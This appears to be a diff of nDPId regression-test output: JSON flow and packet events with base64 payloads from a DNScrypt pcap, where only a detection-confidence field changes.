AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":542,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":56988,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":542,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":56988,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":543,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":50062,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":543,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":1,"flow_last_seen":946739400460,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739400460,"pkt":"REREREREZmZmZmZmCABFAAIc9\/NAAH4RCGsKAAABucF\/9MOOAbsCCPyL\/IsBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAl5b2Zpamktc2UAABAAAQAAAAAAAAAAAAHKAAwBxgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":543,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":50062,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":543,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":50062,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":544,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":59354,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01145{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":544,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":1,"flow_last_seen":946739400460,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739400460,"pkt":"REREREREZmZmZmZmCABFAAIcPTVAAH4RwykKAAABucF\/9OfaAbsCCPyL\/I0BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAl5b2Zpamktc2UAABAAAQAAAAAAAAAAAAHKAAwBxgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":544,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":59354,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":544,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":59354,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":545,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":54920,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02428{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":545,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":1,"flow_last_seen":946739400460,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739400460,"pkt":"REREREREZmZmZmZmCABFAAXcPTYgAH4R32gKAAABucF\/9NaIAbsGBKQ8\/IwBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAl5b2Zpamktc2UAABAAAQAAAAAAAAAAAAXGAAwFwgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":545,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":54920,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":545,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":54920,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection 
failed","datalink":1,"packet_id":546,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739400460} 00421{"packet_event_id":1,"packet_event_name":"packet","packet_id":546,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739400460,"pkt":"REREREREZmZmZmZmCABFAABQPTYAuX4RBDwKAAABucF\/9AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":547,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":46314,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02428{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":547,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":1,"flow_last_seen":946739400460,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739400460,"pkt":"REREREREZmZmZmZmCABFAAXcPTggAH4R32YKAAABucF\/9LTqAbsGBMXY\/I4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAl5b2Zpamktc2UAABAAAQAAAAAAAAAAAAXGAAwFwgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":547,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":46314,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":547,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":46314,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":548,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":47971,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02428{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":548,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":1,"flow_last_seen":946739400460,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739400460,"pkt":"REREREREZmZmZmZmCABFAAXcPTcgAH4R32cKAAABucF\/9LtjAbsGBL9j\/IoBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAl5b2Zpamktc2UAABAAAQAAAAAAAAAAAAXGAAwFwgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":548,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":47971,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
